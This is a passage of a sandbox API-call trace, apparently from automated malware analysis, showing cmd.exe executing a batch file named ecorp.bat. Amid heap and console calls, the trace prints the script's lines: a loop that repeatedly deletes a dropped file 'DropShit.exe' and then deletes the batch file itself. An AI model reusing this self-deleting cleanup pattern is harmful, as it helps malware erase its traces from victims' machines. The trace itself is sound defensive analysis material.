lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x14dc10 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.927] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x14db90, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14db90*=0x13) returned 1 [0091.927] FindNextFileW (in: hFindFile=0x26cea0, lpFindFileData=0x26f1f4 | out: lpFindFileData=0x26f1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 0 [0091.927] GetLastError () returned 0x12 [0091.927] FindClose (in: hFindFile=0x26cea0 | out: hFindFile=0x26cea0) returned 1 [0091.927] GetProcessHeap () returned 0x250000 [0091.927] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f1e0 | out: hHeap=0x250000) returned 1 [0091.927] GetProcessHeap () returned 0x250000 [0091.927] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f170 | out: hHeap=0x250000) returned 1 [0091.927] GetProcessHeap () returned 0x250000 [0091.927] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266b20 | out: hHeap=0x250000) returned 1 [0091.927] GetProcessHeap () returned 0x250000 [0091.927] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ce30 | out: hHeap=0x250000) returned 1 [0091.927] GetProcessHeap () returned 0x250000 [0091.927] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ef00 | out: hHeap=0x250000) returned 1 [0091.927] GetProcessHeap () returned 0x250000 [0091.927] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251b30 | out: hHeap=0x250000) returned 1 [0091.927] GetProcessHeap () returned 0x250000 [0091.927] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0091.928] GetProcessHeap () returned 0x250000 [0091.928] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cdd0 | out: hHeap=0x250000) returned 1 [0091.928] GetProcessHeap () returned 0x250000 [0091.928] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd70 | out: hHeap=0x250000) returned 1 [0091.928] GetProcessHeap () returned 0x250000 [0091.928] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266ae0 | out: hHeap=0x250000) returned 1 [0091.928] GetProcessHeap () returned 0x250000 [0091.928] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd30 | out: hHeap=0x250000) returned 1 [0091.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.928] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.928] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.928] SetConsoleInputExeNameW () returned 0x1 [0091.928] GetConsoleOutputCP () returned 0x1b5 [0091.928] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.928] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.929] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.929] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.929] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.929] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.929] GetProcessHeap () returned 0x250000 [0091.929] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.929] GetProcessHeap () returned 0x250000 [0091.929] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.929] GetProcessHeap () returned 0x250000 [0091.929] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.929] GetProcessHeap () returned 0x250000 [0091.929] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.929] GetProcessHeap () returned 0x250000 [0091.929] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0091.929] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.929] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.929] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x34, lpOverlapped=0x0) returned 1 [0091.929] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.929] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=37, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="if exist \"DropShit.exe\" goto Repeat\r\n") returned 37 [0091.929] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.929] GetFileType (hFile=0x5c) returned 0x1 [0091.929] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.929] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.929] GetProcessHeap () returned 0x250000 [0091.929] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27a760 [0091.929] GetProcessHeap () returned 0x250000 [0091.930] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a760 | out: hHeap=0x250000) returned 1 [0091.930] GetProcessHeap () returned 0x250000 [0091.930] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0091.930] GetProcessHeap () returned 0x250000 [0091.930] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x27a2f0 [0091.930] GetProcessHeap () returned 0x250000 [0091.930] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x264610 [0091.930] GetProcessHeap () returned 0x250000 [0091.930] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x264610, Size=0x1e) returned 0x2645e0 [0091.930] GetProcessHeap () returned 0x250000 [0091.930] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2645e0) returned 0x1e [0091.930] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0091.930] GetProcessHeap () returned 0x250000 [0091.930] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cff0 [0091.930] GetProcessHeap () returned 0x250000 [0091.930] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x264610 [0091.930] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0091.930] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0091.930] GetProcessHeap () returned 0x250000 [0091.930] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0091.930] GetProcessHeap () returned 0x250000 [0091.930] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4c) returned 0x26ccf0 [0091.930] GetProcessHeap () returned 0x250000 [0091.930] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26ccf0, Size=0x30) returned 0x26ccf0 [0091.931] GetProcessHeap () returned 0x250000 [0091.931] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26ccf0) returned 0x30 [0091.931] GetProcessHeap () returned 0x250000 [0091.931] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26d0b0 [0091.931] GetProcessHeap () returned 0x250000 [0091.931] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x278f90 [0091.931] GetProcessHeap () returned 0x250000 [0091.931] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x278fc0 [0091.931] _tell (_FileHandle=3) returned 66 [0091.931] _close (_FileHandle=3) returned 0 [0091.931] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.931] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.931] GetFileType (hFile=0x7) returned 0x2 [0091.931] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.931] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.932] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.932] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.932] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.932] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.932] GetFileType (hFile=0x7) returned 0x2 [0091.932] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.932] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.933] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.933] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.933] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer="if ") returned 3 [0091.933] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.933] GetFileType (hFile=0x7) returned 0x2 [0091.933] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.933] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.933] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.933] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x3) returned 1 [0091.934] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x14efa8 | out: _Buffer="exist \"DropShit.exe\" ") returned 21 [0091.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.934] GetFileType (hFile=0x7) returned 0x2 [0091.934] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.934] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.934] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x15) returned 1 [0091.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.934] GetFileType (hFile=0x7) returned 0x2 [0091.934] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.934] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.935] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x278fa0*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x278fa0*, lpNumberOfCharsWritten=0x14efa8*=0x4) returned 1 [0091.935] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efa8 | out: _Buffer=" Repeat ") returned 8 [0091.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.935] GetFileType (hFile=0x7) returned 0x2 [0091.935] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.935] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.935] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1 [0091.935] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.936] GetFileType (hFile=0x7) returned 0x2 [0091.936] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.936] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.936] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.936] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.936] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x208, lpBuffer=0x14eae0, lpFilePart=0x14e880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14e880*="DropShit.exe") returned 0x32 [0091.936] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0091.936] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x1, lpFindFileData=0x14e890, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e890) returned 0x26cd30 [0091.937] FindClose (in: hFindFile=0x26cd30 | out: hFindFile=0x26cd30) returned 1 [0091.937] GetConsoleTitleW (in: lpConsoleTitle=0x14ec40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.937] GetProcessHeap () returned 0x250000 [0091.937] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266aa0 [0091.937] GetProcessHeap () returned 0x250000 [0091.937] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x266aa0, Size=0x20) returned 0x278ff0 [0091.937] GetProcessHeap () returned 0x250000 [0091.937] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x278ff0) returned 0x20 [0091.937] GetProcessHeap () returned 0x250000 [0091.937] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266aa0 [0091.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e6f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.937] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.937] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.937] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.937] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.937] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51 [0091.937] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.937] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.937] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.937] GetFileType (hFile=0x5c) returned 0x1 [0091.937] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.937] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0xf, lpOverlapped=0x0) returned 1 [0091.938] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=15, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr="del ecorp.bat\r\n") returned 15 [0091.938] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.938] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.938] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.938] GetFileType (hFile=0x5c) returned 0x1 [0091.938] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.938] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x0, lpOverlapped=0x0) returned 1 [0091.938] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.938] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.938] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.938] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.938] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.938] GetFileType (hFile=0x5c) returned 0x1 [0091.938] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.938] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x51, lpOverlapped=0x0) returned 1 [0091.938] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.938] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=9, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr=":Repeat\r\n.bat\r\n") returned 9 [0091.938] _close (_FileHandle=3) returned 0 [0091.938] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.938] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.938] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.938] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.939] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.939] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.939] SetConsoleInputExeNameW () returned 0x1 [0091.939] GetConsoleOutputCP () returned 0x1b5 [0091.939] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.939] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.939] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.939] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.939] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.939] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.939] GetProcessHeap () returned 0x250000 [0091.939] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.939] GetProcessHeap () returned 0x250000 [0091.939] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278ff0 | out: hHeap=0x250000) returned 1 [0091.939] GetProcessHeap () returned 0x250000 [0091.939] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0091.939] GetProcessHeap () returned 0x250000 [0091.939] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0091.939] GetProcessHeap () returned 0x250000 [0091.940] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d0b0 | out: hHeap=0x250000) returned 1 [0091.940] GetProcessHeap () returned 0x250000 [0091.940] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.940] GetProcessHeap () returned 0x250000 [0091.940] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.940] GetProcessHeap () returned 0x250000 [0091.940] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264610 | out: hHeap=0x250000) returned 1 [0091.940] GetProcessHeap () returned 0x250000 [0091.940] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cff0 | out: hHeap=0x250000) returned 1 [0091.940] GetProcessHeap () returned 0x250000 [0091.940] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2645e0 | out: hHeap=0x250000) returned 1 [0091.940] GetProcessHeap () returned 0x250000 [0091.940] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.940] GetProcessHeap () returned 0x250000 [0091.940] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0091.940] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.940] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.940] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x48, lpOverlapped=0x0) returned 1 [0091.940] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.940] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=20, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del \"DropShit.exe\"\r\nxe\" goto Repeat\r\n") returned 20 [0091.940] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.940] GetFileType (hFile=0x5c) returned 0x1 [0091.940] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.940] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.940] GetProcessHeap () returned 0x250000 [0091.940] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27a760 [0091.940] GetProcessHeap () returned 0x250000 [0091.940] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a760 | out: hHeap=0x250000) returned 1 [0091.940] GetProcessHeap () returned 0x250000 [0091.940] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0091.940] GetProcessHeap () returned 0x250000 [0091.940] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0091.941] GetProcessHeap () returned 0x250000 [0091.941] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266a60 [0091.941] _tell (_FileHandle=3) returned 29 [0091.941] _close (_FileHandle=3) returned 0 [0091.941] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.941] GetFileType (hFile=0x7) returned 0x2 [0091.941] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.941] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.941] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.942] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.942] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.942] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.942] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.942] GetFileType (hFile=0x7) returned 0x2 [0091.942] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.942] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.942] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.942] 